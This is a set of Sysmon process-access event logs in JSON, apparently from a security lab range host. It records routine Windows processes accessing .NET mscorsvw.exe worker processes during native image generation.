{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6687,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.152\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010A9820C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.152","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010A9820C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6688,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.152\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0476-5F25-0000-0010A9820C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.152","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0476-5F25-0000-0010A9820C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6689,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.167\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001024E00C00}\r\nTargetProcessId: 1328\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.167","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001024E00C00}","TargetProcessId":"1328","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6690,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.339\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010CDE30C00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.339","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010CDE30C00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6691,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.339\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010CDE30C00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.339","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010CDE30C00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6692,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.355\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010CDE30C00}\r\nTargetProcessId: 3984\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.355","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010CDE30C00}","TargetProcessId":"3984","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6693,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.386\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:20.386","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-001045E70C00}","TargetProcessId":"2392","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:20","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6694,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:20.386\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-001045E70C00}\r\nTargetProcessId: 2392\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: 